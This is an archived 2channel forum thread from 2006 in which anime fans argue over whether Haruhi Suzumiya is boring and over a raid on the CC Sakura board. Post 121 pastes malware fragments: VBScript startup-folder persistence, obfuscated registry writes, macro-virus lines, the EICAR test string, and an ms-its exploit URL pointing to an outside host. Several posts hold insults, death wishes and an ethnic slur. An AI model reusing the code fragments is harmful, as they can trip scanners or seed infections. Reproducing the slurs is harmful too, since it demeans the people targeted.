2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ハルヒつまらんって言う奴は何なの?

1 :ただの名無しには興味ありません:2006/08/16(水) 16:25:48 ID:SdCzujgLO
見てから言え。
見たけどつまらんとか言う奴は原作嫁。
それでもつまらんって言う奴は、まず語句の意味がわかってないDQNか
映画とか見たときポカーンしてる人。

もしくはガチ少数派 ←これは仕方ない

2 :CC名無したん:2006/08/16(水) 16:26:40 ID:mbMRDPIo0
俺は多数派、つまり面白くない

3 :CC名無したん:2006/08/16(水) 16:27:12 ID:DW5heaGTO
つまんねーよカス死ね

4 :CC名無したん:2006/08/16(水) 16:27:35 ID:hwsMxHdg0
原作しか読んでないが、一巻はまあ面白かった
二巻がクズで以降読む気なくした

5 :CC名無したん:2006/08/16(水) 16:27:51 ID:tbQnIUG90
CCさくらもハルヒも好きだ

6 :CC名無したん:2006/08/16(水) 16:28:07 ID:IXtOsece0
(;^ω^)

7 :ただの名無しには興味ありません:2006/08/16(水) 16:28:18 ID:SdCzujgLO
どういうところがつまらんの?

8 :CC名無したん:2006/08/16(水) 16:28:42 ID:X3349KbK0
SFアニメの皮を被った電波学園もの

9 :CC名無したん:2006/08/16(水) 16:29:07 ID:MCuVFfyaO
原作がつまんねーんだよボケ

10 :CC名無したん:2006/08/16(水) 16:30:34 ID:DW5heaGTO
すべてがつまんねー死ね

11 :CC名無したん:2006/08/16(水) 16:30:51 ID:NOMaf5sM0
アニメ>>越えられないカベ>>原作

12 :CC名無したん:2006/08/16(水) 16:31:24 ID:QHX0iYoA0
見たことないし見るつもりもないけど絶対につまらないと思う

13 :CC名無したん:2006/08/16(水) 16:31:40 ID:4poGUEIS0
ハルヒもエヴァも好きですよ(;^ω^)

14 :ただの名無しには興味ありません:2006/08/16(水) 16:31:43 ID:SdCzujgLO
憂鬱はいちおうスニーカー大賞受賞作品なんだがな

15 :CC名無したん:2006/08/16(水) 16:32:47 ID:LCFc52Pb0
スニーカー大賞(笑)

16 :CC名無したん:2006/08/16(水) 16:32:53 ID:Z3TdX6W/0
原作は読んでない
アニメは1分かからずにチャンネルを変えさせた兵だった

17 :CC名無したん:2006/08/16(水) 16:33:17 ID:Pw3XU7wRO
>>14
こえだめの中の綺麗なウンコというのと同レベル

18 :CC名無したん:2006/08/16(水) 16:33:44 ID:b4Y5paYw0
面白いといえばアンチが叫びつまらないといえば信者が叫ぶ
2chっていう多くの意見が溢れてる場にいる以上仕方が無いんだがね

19 :ただの名無しには興味ありません:2006/08/16(水) 16:33:52 ID:SdCzujgLO
>>16
まさかとは思うが1話じゃないだろうな?

20 :CC名無したん:2006/08/16(水) 16:34:53 ID:Hh8pHN6jO
エヴァもハルヒも好きだよ
さくらは見た事がないなぁ…再放送を一回ぐらいか?
あんまロリ好きじゃないから見なかったかも
てかこの板の人ってグロ好きだよね
それが一番気持ち悪い。性癖否定してすまん。

21 :CC名無したん:2006/08/16(水) 16:35:04 ID:Z3TdX6W/0
>>19
違うはず

22 :CC名無したん:2006/08/16(水) 16:35:43 ID:tbQnIUG90
            _ ノ)
         γ∞γ~  \
         |  / メノ从) )
         ヽ | | l  l |〃 カタカタ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
           `从ハ~ ワノ)    < さくらハルヒみたいなお姉ちゃんほしいもん
       __.∬(つ/ ̄ ̄ ̄/__   \____________
      /\旦\/WiNDy/   \
     /+ \________ヽ
     〈\ + + +    + + `、
     \ \________________ヽ
      `、_____________〉

23 :CC名無したん:2006/08/16(水) 16:36:57 ID:NOMaf5sM0
>>14
じゃあ漫画で手塚賞とったら有無を言わせずマンセーなんですか?^^;

24 :CC名無したん:2006/08/16(水) 16:37:10 ID:Hh4Fsb0T0
ハルヒはヲタ向け。一般人に見せたら絶対につまらないと思う。

25 :CC名無したん:2006/08/16(水) 16:37:34 ID:xtQkGKdNO
てめぇらみてぇなキモイ儲見たから
原作なんか見る気もしねーよ

26 :CC名無したん:2006/08/16(水) 16:37:45 ID:lQUrnBP50
メタとしては下手だしありふれてるけど
オタに受けるキャラを作ってうまく絡めてると思った。
ちなみに原作の途中までしか見てない

>>1はどのあたりが好きなの?

27 :CC名無したん:2006/08/16(水) 16:38:35 ID:r3pVNseS0
        -=-::.
  /       \:\
  .|          ミ:::|
 ミ|_≡=、´ `, ≡=_、 |;/
  ||..● .| ̄|. ● |─/ヽ
  |ヽ二/  \二/  ∂>  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 /.  ハ - −ハ   |_/ < このスレはケシカランね
 |  ヽ/ヽ/\_ノ  / |   | さくら厨どもの巣だね 
. \、 ヽ二二/ヽ  / /   | と言うわけでハルヒ信者よ、荒らしなさい
.   \i ___ /_/    \________

28 :CC名無したん:2006/08/16(水) 16:38:41 ID:fvF0dj4u0
石恵のハルヒ本うpしろよ

29 :CC名無したん:2006/08/16(水) 16:38:48 ID:DW5heaGTO
キチガイ気取ったおめでてー頭の糞女の糞物語

30 :CC名無したん:2006/08/16(水) 16:40:07 ID:Hh8pHN6jO
ハルヒはヲタ向けかもねぇ
さくらは何向け?
小学生あたり?

31 :CC名無したん:2006/08/16(水) 16:40:25 ID:Hh4Fsb0T0
それに京アニが作ってなかったらただの糞アニメだっただろう。
原作者は京アニに土下座した方がいい。

32 :CC名無したん:2006/08/16(水) 16:42:03 ID:DkofvgPVO
ハルヒ厨のせいでハルヒそのものの印象も悪くなってるなぁ

33 :ただの名無しには興味ありません:2006/08/16(水) 16:44:07 ID:asMSzfOd0
「涼宮ハルヒの憂鬱」を、まだ、見たことのない人はこちらでどうぞ。
http://www.youtube.com/watch?v=0OPTF2YWE84

34 :CC名無したん:2006/08/16(水) 16:44:41 ID:Hh4Fsb0T0
>>32
youtubeにダンス動画うpとかは辞めて欲しいな

35 :CC名無したん:2006/08/16(水) 16:48:15 ID:tzl4WdJr0
ゾンビーズとか死ねよ

36 :CC名無したん:2006/08/16(水) 16:49:52 ID:xB2B9XiXO
ハルヒは言うほど面白くない。
それはCCさくらにも言えることだが。

37 :ただの名無しには興味ありません:2006/08/16(水) 16:50:07 ID:SdCzujgLO
>>23
少なくとも客観的にみていい作品ということ

>>26
まあ明らかにVIPPER狙いの表現もあるがな。
俺は原作、アニメ問わずまずキャラ萌えってのがある。
何が面白いのかと聞かれたら、文章力のない俺には辛いが、
作者の表現の意図するところとかがなんとなくわかってきたりしてハマっていく。

遅レスすまん

38 :CC名無したん:2006/08/16(水) 16:51:28 ID:wAa/c3xE0
その点パタパタ飛行船は良かった

39 :CC名無したん:2006/08/16(水) 16:54:34 ID:pqdef8Rk0
面白くねえだろ
むしろつまらん

40 : ◆CDbhsnK77k :2006/08/16(水) 16:55:31 ID:U8BXMmu40
マターリいきましょうよ

41 :ただの名無しには興味ありません:2006/08/16(水) 16:57:04 ID:SdCzujgLO
>>40
つようつべ

42 :CC名無したん:2006/08/16(水) 16:57:42 ID:bUfmByWUO
所詮、1クールアニメのハルヒ

43 :CC名無したん:2006/08/16(水) 16:59:50 ID:qt8Fq9FvO
ギャグとしては普通に面白いと思うんだが

44 :CC名無したん:2006/08/16(水) 17:02:00 ID:0dxHMi2I0
最近PCが重い!

├ 1.PCを買い換える
│                              
│    [まちがい]                         
│      確実な方法ではありますが、お金がかかるのが難点です。
│      それよりも別の手段を探してみませんか?
│      ちょっとしたフリーウェアでなんとかなるかも?
│              ↑
│          ココがポイント!

└ 2.Windows Live Safety Centerを使う

      [せいかい]

※しかもMS純正製品!

Windows Live Safety Center
ttp://safety.live.com/site/ja-JP/default.htm

無料で利用できるコンピュータの安全なスキャン
Windows Live Safety Center でコンピュータをチューンナップ
ttp://www.microsoft.com/japan/athome/security/update/windows_live_safety_center.mspx


45 :CC名無したん:2006/08/16(水) 17:03:48 ID:Hh4Fsb0T0
>>42
二期が決まったんじゃなかったっけ?

46 :CC名無したん:2006/08/16(水) 17:04:03 ID:mVrgVo4x0
見る分には面白い
厨はウザい

47 :CC名無したん:2006/08/16(水) 17:06:51 ID:Hh4Fsb0T0
>>46
これが真相だな。
本当ならハマってたかもしれなかったけど、ハルヒって単語出るだけでトラウマ。
CCはどっちにしろ好きになれなかっただろうけど。

48 :CC名無したん:2006/08/16(水) 17:08:49 ID:JR7+Vz+K0
ハルヒって、要は邪気眼でしょ?
キモ女見てたのしいか?

49 :CC名無したん:2006/08/16(水) 17:13:43 ID:uw7O8ugDO
面白いことは面白いけど中途半端なんだよな
何か一つでも一番と言えるものがあるかといえば無いだろう

50 :CC名無したん:2006/08/16(水) 17:15:09 ID:mVrgVo4x0
ハルヒに引っ張りまわされるくらいなら
いぬかみのようこに引っ張りまわされる方が良い

51 :CC名無したん:2006/08/16(水) 17:18:28 ID:U0dCIwOS0
面白いけど佳作の域は出ないな。長門は最高だけど

52 :CC名無したん:2006/08/16(水) 17:19:17 ID:YcEx4x1C0
長門が一番ウザい。

53 :CC名無したん:2006/08/16(水) 17:20:24 ID:lQUrnBP50
>>48
むしろ影羅だな

54 :CC名無したん:2006/08/16(水) 17:20:32 ID:ISI/0vNd0
さくらツマンネ

55 :CC名無したん:2006/08/16(水) 17:21:11 ID:MwBT2vJm0
2000年からあるスレが残ってるな
何か感動した

56 :CC名無したん:2006/08/16(水) 17:22:06 ID:EAWGVw4E0
マンセーしてる奴らはSF小説の1冊でも読んだことあるんだろうな?
ラノベじゃないぞ?w

57 :CC名無したん:2006/08/16(水) 17:23:06 ID:IuUgX5dq0
ハルヒスレのやつらが恐ろしいのは、全部アンチの仕業ってことにしてることだ。

58 :ただの名無しには興味ありません:2006/08/16(水) 17:25:42 ID:SdCzujgLO
厨が〜だから厨がウザいからっていうけどさ、それだけ影響力のあるアニメだってことだよ。

ハルヒ好きと聞くや否や厨だ厨だ言う奴は真性のアフォだから、もし厨扱いされるのが
嫌でハルヒを毛嫌いしてたって人がいたら、
そういうアフォの話は聞かないで一回トライすることをオススメする。

59 :CC名無したん:2006/08/16(水) 17:27:21 ID:mVrgVo4x0
>>58
半年ROMれ

60 :CC名無したん:2006/08/16(水) 17:32:18 ID:YcEx4x1C0
>>58
要約すると・・・
「ハルヒが嫌われるわけないんだ。嫌ってるのは周りに流されてるだけなんだ。」
・・・ってことですな。

アホかw

61 :CC名無したん:2006/08/16(水) 17:32:24 ID:xQ9uOj8M0
原作はハッキリ言ってつまらなかった
アニメ1話は結構面白かった
それ以降は少し面白いと思う回少しつまんないと思う回くらいの幅はあったが普通
長門は好き

62 :CC名無したん:2006/08/16(水) 17:33:11 ID:uv54b6tP0
ハルヒがうざくて観てられない

63 :CC名無したん:2006/08/16(水) 17:33:37 ID:mVrgVo4x0
ただ作画は非常に良い
目の保養にすらなる

64 :CC名無したん:2006/08/16(水) 17:37:30 ID:X3349KbK0
良すぎるものは痛い信者を産む、悲しいかな。
鍵にしろ月にしろハルヒに白。

65 : ◆CDbhsnK77k :2006/08/16(水) 17:45:34 ID:U8BXMmu40
祭りは収束しました。ハルヒ厨のみなさんはすみやかに撤退してください。

66 :ただの名無しには興味ありません:2006/08/16(水) 17:48:02 ID:SdCzujgLO
>>57
本スレは見てないが少なくともVIPスレのやつらは動いてないぞ。

67 :CC名無したん:2006/08/16(水) 17:48:33 ID:jDPpKhHL0
>>58みたいなのが一番性質が悪いというのはよく分かった

68 :CC名無したん:2006/08/16(水) 17:49:19 ID:uWbgSIj20
ハルヒつまらん

69 :CC名無したん:2006/08/16(水) 17:50:37 ID:X3349KbK0
>>58
お前のような厨が一番嫌われるんだよw
さっさとパソコン消してハルヒでオナってろwwww

70 :ただの名無しには興味ありません:2006/08/16(水) 17:50:57 ID:SdCzujgLO
>>67
アンチ活動乙

71 :CC名無したん:2006/08/16(水) 17:52:05 ID:OEcQbxgi0
とりあえずこのスレも削除されないかな。
アンチのせいでハルヒ信者の汚点が増える。
もともと汚点が多すぎる気もしないではないが。

72 :CC名無したん:2006/08/16(水) 17:53:41 ID:P5t1RGCdO


 __[警]
  (  ) ('A`)>>1
  (  )Vノ )
   | |  | |



73 :CC名無したん:2006/08/16(水) 17:54:38 ID:JR7+Vz+K0
>>58
こういうこと言っちゃうのが痛すぎる。
今まで厨はたくさんいたけど、ハルヒ厨は特別痛い。

影響力って絶対値で語るなら、全話ゲロの映像ながしたほうが影響力あるぞw


74 :CC名無したん:2006/08/16(水) 17:54:56 ID:s7oxy0Ym0
面白い面白くない以前に信者が糞すぎて作品が好きになれない物の筆頭

75 :CC名無したん:2006/08/16(水) 17:58:06 ID:N9ZwhF8k0
>>64
全然関係ないスレで突然月の話題出してスレ荒らす月厨とは共通点多いかもな
良すぎるってのはどーかと思うが

76 :CC名無したん:2006/08/16(水) 18:00:37 ID:hVxX/SCaO
>>58
ハルヒ見たことないけど、無意味に人をけなす行為は最低だと思うよ

77 :CC名無したん:2006/08/16(水) 18:01:50 ID:U0dCIwOS0
ハルヒ厨は責任転嫁しかしないな

78 :CC名無したん:2006/08/16(水) 18:02:46 ID:pZrckfYO0
>>1
中身が無い
面白いことは面白いけど1ヶ月も経てば忘れる
ゼロの使い魔みてるうちに忘れてたし

正直エヴァの様に後を引きずらないんだよな何故か

あーそういやこんなのもあったっけってかんじ
一クールっていう薄さも原因かも

79 :CC名無したん:2006/08/16(水) 18:04:01 ID:+vCP+0k90
アニメやる前から原作読んでる俺としてはハルヒは二巻以降は読む意味無い
つか話が全く進展しねー

80 :CC名無したん:2006/08/16(水) 18:04:48 ID:/riEVppn0
毎月うんざりするほどでてる有象無象のラノベと何が違うんだ

81 :CC名無したん:2006/08/16(水) 18:09:02 ID:SdCzujgLO
この一件でいったい何人のアンチがこの板から量産されたのでしょうか。
こうして作品としてのハルヒの寿命は削られていくのですね。
さくら板の人達にも迷惑をかけましたし、そろそろ退散させて頂きますね( ^ω^)
本当にありがとうございました。

82 :CC名無したん:2006/08/16(水) 18:09:40 ID:+dvgKnqO0
       ____
     /      \
   /  _ノ  ヽ、_  \
  / o゚((●)) ((●))゚o \  ほんとはハルヒ板が欲しいんだお
  |     (__人__)    |
  \     ` ⌒´     /


       ____
     /      \
   /  _ノ  ヽ、_  \
  /  o゚⌒   ⌒゚o  \  でも運営は作品単体の板は立てないって言ってるお
  |     (__人__)    |  
  \     ` ⌒´     /


       ____
     /⌒  ⌒\
   /( ●)  (●)\
  /::::::⌒(__人__)⌒::::: \   だからさくら板をハルヒスレで埋め尽くして板名を変えさせるお!
  |     |r┬-|     |
  \      `ー'´     /

83 :1001:2006/08/16(水) 18:10:00 ID:tzl4WdJr0
>>1
このスレッドは1000を超えたよ!!
次スレもさくらと一緒に、レリーズ☆★
   ♥ http://anime.2ch.net/sakura/ ♥
______ ._________________
            ∨
    ,   _ ノ)
  γ∞γ~  \
   |  / 从从) ) これでよし…っと♪
  ヽ | | l  l |〃  _____
   `从ハ~ ーノ) //       /
     / つ><|つ//       /
       8|\//__,Sakura_/
        \}===========}

84 :CC名無したん:2006/08/16(水) 18:11:10 ID:IYaWGoFl0
ハルヒアンチ?No!   ハルヒ 厨 アンチ!!

85 :CC名無したん:2006/08/16(水) 18:17:18 ID:DqImWdxx0
ハルヒ厨でもさくら厨でもないんだけど
なんでこの板は独立してあるの?
エヴァみたいに過去の栄光があるからなの?

86 :CC名無したん:2006/08/16(水) 18:19:12 ID:SNKX0yGz0
>>56
ν速でハルヒはハードSFって主張してた奴いたのには噴いた

87 :CC名無したん:2006/08/16(水) 18:21:48 ID:DqImWdxx0
てかなんで関係ない俺が書き込んでるの?

88 :石川ドサエモン:2006/08/16(水) 18:28:47 ID:vCD6qNsc0
>>86
浜の真砂は尽きるとも 世にウマシカの種は尽きまじ

89 :CC名無したん:2006/08/16(水) 18:32:17 ID:/riEVppn0
ホーガンとバクスターとニーヴンぐらいは最低読んでんだろうな、ハードSFとか
ぬかしてる連中は。

90 :CC名無したん:2006/08/16(水) 18:40:14 ID:rb8imGD00
削除人はどうした?

91 :ただの名無しには興味ありません:2006/08/16(水) 18:55:16 ID:hYedCi8n0
さくらが好きなんて、子供に手を出して犯罪犯すような椰子なんだから、
さっさと死刑にしてほしい

92 :CC名無したん:2006/08/16(水) 18:58:10 ID:aE7Nt+Cl0
ハルヒ板にしなくていいからこの板もいいかげんいらないだろ

93 :CC名無したん:2006/08/16(水) 18:59:34 ID:ioTUhfjE0
ひろゆきが大好きなのでいらなくないです。

94 :CC名無したん:2006/08/16(水) 19:09:10 ID:2DpQ6IQ0O
ネガキャンうぜー
ハルヒ好きにとっても迷惑極まりないし
こういう奴をマジにアク禁にして欲しい

95 :CC名無したん:2006/08/16(水) 19:10:03 ID:2G1IxibAO
なぜ群馬では放送されなかったのですか?

96 :CC名無したん:2006/08/16(水) 19:12:26 ID:PNu79onvO
ハルヒ板から来ました

97 :CC名無したん:2006/08/16(水) 19:23:28 ID:jIMCp3QZ0
>>1
同意。
原作を全部読んでから批判すべきだよな

>>4
4巻が面白いと思う

98 :CC名無したん:2006/08/16(水) 19:39:42 ID:A2XRaqlGO
>>1まさしく価値観の押し付け

99 :CC名無したん:2006/08/16(水) 19:40:13 ID:w080ElfeO
ハルヒ原作の作者は日本語を勉強してくだしあ><
アニメの方は京アニだし普通だったな
面白くないけど
じゃあVIPに帰りますね^^^^^

100 :CC名無したん:2006/08/16(水) 19:45:25 ID:xtQkGKdNO
>>98
同意

101 :CC名無したん:2006/08/16(水) 19:48:42 ID:veFVtrTZ0
ハルヒ面白い言うから見たけど2分で心が折れた
あれならシスプリを100話強制的に見させられるほうがマシ

102 :CC名無したん:2006/08/16(水) 19:52:58 ID:IFaUCr2i0
【長門有希担当】
http://etc3.2ch.net/test/read.cgi/denpa/1152441544/

103 :CC名無したん:2006/08/16(水) 19:54:11 ID:yAUdxrh+0
>>1
ハルヒなんて普通のアニメじゃん
毎年祭り上げられては消えていく哀れな萌えアニメのひとつ

104 :CC名無したん:2006/08/16(水) 19:58:43 ID:3oCR43DKO
糞アニメ

105 :CC名無したん:2006/08/16(水) 19:59:43 ID:3oCR43DKO


106 :ばーてん ◆bartenYK4Y :2006/08/16(水) 20:02:36 ID:CxhW2r5/O
>>103
さくらは再放送されてるから何ともいえないだろ

107 :ただの名無しには興味ありません:2006/08/16(水) 20:03:14 ID:hYedCi8n0
アンチスレは伸びるなー

108 :CC名無したん:2006/08/16(水) 20:05:17 ID:ITtACGTs0
塚、こんなくだらん運動するから嫌われるんだよな

109 :CC名無したん:2006/08/16(水) 20:06:01 ID:EJgBcIlB0
http://jbbs.livedoor.jp/anime/4151/
ハルヒ板できたお
マターリやりませう。。。

110 :CC名無したん:2006/08/16(水) 20:10:54 ID:OD9CZ4IP0
ハルヒは好きだがどこの板スレ関係なく宣伝するハルヒ厨はウザイしキモイ

111 :CC名無したん:2006/08/16(水) 20:23:45 ID:H+jOGQlY0
飛ばされたついでにこの板眺めてるが、
作品(CCS、ハルヒ他問わず)の批判してるスレばかり勢いがあってワラタwwwwwww
どんだけレベル低い奴らのかたまりなんだよwwwwwwww

112 :CC名無したん:2006/08/16(水) 20:30:13 ID:894hqYANO
つまらないとは思わない

だがくだらないとは思う

113 :CC名無したん:2006/08/16(水) 20:30:49 ID:yAUdxrh+0
VIPは2chの韓国

ニダのかわりに語尾にぉ(キメェwww
反論できなくなると火病ってAA貼り
やたら他の板にちょっかいをだす
謝罪を求めるために荒らす←意味ワカランw
性犯罪を実況する(姉の、妹の)
論破されたりするとすぐ自殺するとか言い出す

114 :CC名無したん:2006/08/16(水) 20:33:07 ID:Mca4acSVO
ハルヒが嫌いなんじゃないハルヒ厨が嫌いなんだ

115 :CC名無したん:2006/08/16(水) 20:36:00 ID:4iGBoP+70
ところでYOUTUBEって金とかいるの?

116 :CC名無したん:2006/08/16(水) 20:37:53 ID:Hh4Fsb0T0
>>115
ハァ??当たり前ぇだろ!!!!!

117 :CC名無したん:2006/08/16(水) 20:38:42 ID:AQT49hpoO
払わないで日本語のファイルうpする厨房が多くて会社側が規制を検討してる

118 :ただの名無しには興味ありません:2006/08/16(水) 20:39:09 ID:y5oug7PW0
>>56
普通の小説とライトノベルの違いとやらを教えてもらいたいものだ。

119 :CC名無したん:2006/08/16(水) 20:39:11 ID:IYaWGoFl0
YOUTUBEは一回動画を見るたびに20円くらいする

120 :ばーてん ◆bartenYK4Y :2006/08/16(水) 20:39:47 ID:CxhW2r5/O
まあ一ついえることは
ハルヒ厨は皆ガキで恥ずかしいってことを知らないクズってことだろ。
俺は流されてきたVIPPERだが偏見の目で見られていい迷惑だ。

121 :CC名無したん:2006/08/16(水) 20:42:23 ID:EQnCHvZs0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

122 :CC名無したん:2006/08/16(水) 20:51:13 ID:yAUdxrh+0
VIPのせいでハルヒ嫌いになったんで責任とってください><


123 :ばーてん ◆bartenYK4Y :2006/08/16(水) 20:52:40 ID:CxhW2r5/O
>>122
すいませんでした

124 :CC名無したん:2006/08/16(水) 20:58:23 ID:yAUdxrh+0
煽りじゃなくほんとにハルヒはすごいと思った。

設定考えた作者は神だと思う

だけどぜーーーーーんぶみんなまるっとまとめてVIPPERが台無しにした

真のハルヒを愛するものとして許さんぜおれは



125 :CC名無したん:2006/08/16(水) 21:02:46 ID:Hh4Fsb0T0
ダメにしたのはVIPPERじゃなくて最初の1位スレを立てた工作員とハルヒ厨だろ。
自分の好きな作品が厨扱いされるって辛いんだろうな・・・。純粋なファンは本当にカワイソス

126 :ばーてん ◆bartenYK4Y :2006/08/16(水) 21:03:31 ID:CxhW2r5/O
>>124
そうなんだハルヒは面白いんだ。原作も読んだからな。
だがしかし…

127 :CC名無したん:2006/08/16(水) 21:13:18 ID:angTUmcm0
コピペ嵐の爆撃を受けている!!

↓Dat落ちを死守すべき今の最重要スレ
カードキャプターすみれ さくらと小狼の子供たち 2
http://anime.2ch.net/test/read.cgi/sakura/1073136436/


【荒らし・突撃】CCさくら板自治スレ3【対策本部】
http://anime.2ch.net/test/read.cgi/sakura/1155718424/


101 名前:CC名無したん[] 投稿日:2006/08/16(水) 20:36:23 ID:CzKG/ZuE0
248 名前:CC名無したん[sage] 投稿日:2006/08/16(水) 20:29:28 ID:ioTUhfjE0
やばいです。スミレスレにも進行が始まったようです。

257 名前:非常事態宣言 ◆vLFa1Zm.AI [sage] 投稿日:2006/08/16(水) 20:34:07 ID:HjzN7ttKO
>>248
大至急、何らかの措置を要請しましょう
すみれスレはさくら板の最重要スレの一つです、1000行くまでには時間がありますので
何とか死守しましょう。
歴史スレの無念を晴らすぞ

128 :CC名無したん:2006/08/16(水) 21:15:53 ID:3D+anyJN0
ハルヒは一巻を発売直後に買った。恐らく>>1よりは先だと思う。
金帯。初版ではなかったからヤフオクで売れないけど。
一冊で切った。アニメ始まって騒ぎだした友人にタダであげた。

129 :CC名無したん:2006/08/16(水) 21:31:52 ID:HTd7jBJC0
みんなツンデレに見えてしょうがない

130 :CC名無したん:2006/08/16(水) 21:33:37 ID:eo8MmrDdO
面白いとは思うけど、2ちゃんの書き込みでひいた
中、高生が好みそう
のいぢは好き

131 :CC名無したん:2006/08/16(水) 21:38:08 ID:hYedCi8n0
のいぢは忘レナ草のときは良かったが、それ以降絵が崩れていっているのが残念
きちんと描けばうまいのに

132 :CC名無したん:2006/08/16(水) 22:05:37 ID:rIoN3PuG0
それにしても本当に人が少ない

133 :CC名無したん:2006/08/16(水) 22:08:28 ID:/BrYiodAO
テレビ見てヒイタ
でも人気あるから原作も面白いのかと思って読んだらつまらなくてヒイタ
ラノベによくある展開だし、語句も難しいの使ってる割によく読めば程度浅いし、極めつけはハルヒと信者と平野厨がうざくてヒイタ
つまり単なる『萌え』狙い

どうせ黒幕は大ドンデン返しでキョンだろ?
地の文が一人称の独白って時点で、「ここ重要」ってのが丸わかり

134 :CC名無したん:2006/08/16(水) 22:27:12 ID:angTUmcm0
★重要★
[CCさくら板が対策すべきこと]

1) 「さくら関連の重要スレ・本スレへのコピペ爆撃によるdat落ち」を防ぐ

2) 「さくら関連の糞スレのage保守」を防ぐ

3) 「ハルヒ関連のスレ乱立」を防ぐ

この3つさえとめれば何とかなる。

↓Dat落ちを死守すべき今の最重要スレ

カードキャプターすみれ さくらと小狼の子供たち 2
http://anime.2ch.net/test/read.cgi/sakura/1073136436/

絶対に、ハルヒ厨房の思い通りにさせるな。
正義はCCさくら板にあり。荒らしから板を守れ!!

135 :CC名無したん:2006/08/16(水) 22:50:09 ID:vzVoS4qzO
鋼鉄ジーグの方が面白いよ。

136 :CC名無したん:2006/08/16(水) 23:26:09 ID:9tqfdOji0
制服!ネコミミ!巫女!

137 :CC名無したん:2006/08/16(水) 23:27:53 ID:KmuwulAp0
895 :名無しさん@初回限定 :2006/08/16(水) 18:52:15 ID:7HHdNJ1d0
これ先導してるのVIPの馬鹿共でしょ

898 :名無しさん@初回限定 :2006/08/16(水) 20:36:49 ID:lWBgWvi00
>>895
ハルヒ厨ってVIPを内包してるよな?

900 :名無しさん@初回限定 :2006/08/16(水) 21:02:37 ID:7HHdNJ1d0
VIPは面白ければなにやってもいいと思ってる馬鹿の集まりだし
各所で芝生使いすぎ、自分から馬鹿ですっていってるから
判別しやすいのはいいんだけどね

お前らエロゲヲタにVIPとハルヒを馬鹿にされてるぞ
http://pie.bbspink.com/test/read.cgi/erog/1152216060/

138 :CC名無したん:2006/08/16(水) 23:43:26 ID:PhFWkLJz0
つか、高々10数話のU局アニメの分際で、
NHK、NHK-BS、劇場版制覇の上、何度も
再放送されている不朽の名作に楯突こうとは…

139 :CC名無したん:2006/08/17(木) 00:18:53 ID:nW/50RDOO
↑↑↑↑↑
きんもー☆

140 :完全理論 ◆NkIqdbD4DY :2006/08/17(木) 00:28:03 ID:eE5GKgi40
ローカルルールより
>ここはCCさくらをはじめとする、
>CLAMP作品&萌え作品についての板です。
>その他のアニメに関しては1作品1スレッドでお願いします。

つまり「CCさくら板の対象作品」とは

1) CLAMP作品(CCさくらなど)
2) 萌え作品
3) その他のアニメ (1作品1スレッド限定)

の3つ。言い換えれば、ローカルルールでは

「1)&2)についての板です。」
「3)に関しては1作品1スレッドでお願いします。」

と明確に定義している。

このようにローカルルールでは「CLAMP作品」と
「萌え作品」は「&」で結ばれた等価な扱いを受けていることが証明された。

ここでハルヒは明らかに2)の萌え作品になるわけで、
1)のCLAMP作品(CCさくらなど)同様に自由なスレ立てが保障されていることになる。

結論:
萌え作品であるハルヒは、CCさくら板のローカルルールによりに、
自由に、好きなだけ、スレを立てることが可能


141 :CC名無したん:2006/08/17(木) 01:02:42 ID:ueBPuPXbO
まぁ、たかが1クールアニメが調子こくなって事だ。

142 :CCさくら板は2002年から萌え作品全般が対象です:2006/08/17(木) 01:09:28 ID:fB3qT1fu0
・ハルヒがCCさくら板で自由にスレ立てできる証拠

CCさくら板案内
http://sakuraita.at.infoseek.co.jp/annai.html
>CCさくら板とは
>さらに2002年6月26日にローカルルール(板内規則)が施行され、
>現在はCCさくらをはじめとするCLAMP作品及び各種萌え作品を扱う板となっています。
>
>「萌え作品」の基準が曖昧ですが、「創作上の可愛い人物が登場した作品」
>が一応の基準とされていると思われます。
>なお、「萌え作品」という概念に媒体の制限はありません。
>漫画・アニメ・CG・小説・ゲーム・音声メディアなど
>各種媒体の作品についてスレ立てが可能です。
*萌え作品であるハルヒは、CCさくら板の対象範囲内と認められた。

>・その他の萌え作品
>上項と同じくローカルルールにて規定された許容範囲です。
>スレ数制限については、ローカルルールに
>>ここはCCさくらをはじめとする、
>>CLAMP作品&萌え作品についての板です。
>>その他のアニメに関しては1作品1スレッドでお願いします。
>とあり、この文章を厳密に解釈すると「萌え作品」については
>スレ数制限がないことになります
*萌え作品のスレ数も「萌え作品はスレ数制限がない」と証明された。

>使用上のマナー?
>・来る者は拒まず
各種萌え作品のスレは、CCさくら板の運営側としても歓迎という姿勢。

結論:
萌え作品であるハルヒは、CCさくら板のローカルルールによりに、
自由に、好きなだけ、スレを立てることが可能

143 :CC名無したん:2006/08/17(木) 01:15:06 ID:iTb04EjS0
原作→ただのキャラ萌えラノベ
アニメ→京アニ
漫画→屑
ドラマ→いっそ神

144 :CC名無したん:2006/08/17(木) 03:19:47 ID:/ccFMqHl0
このスレまだあるのかよ。









まぁ都合のいい美化伝を語り継ぐにはいいスレタイだな。
朝鮮みたいだけどまぁいいか

145 :CC名無したん:2006/08/17(木) 06:42:21 ID:9DBjuep60
ひでぇ・・・・
ttp://www.youtube.com/watch?v=FgmusIFm9A8

146 :CC名無したん:2006/08/17(木) 06:46:51 ID:DIgbVE5j0
>>142
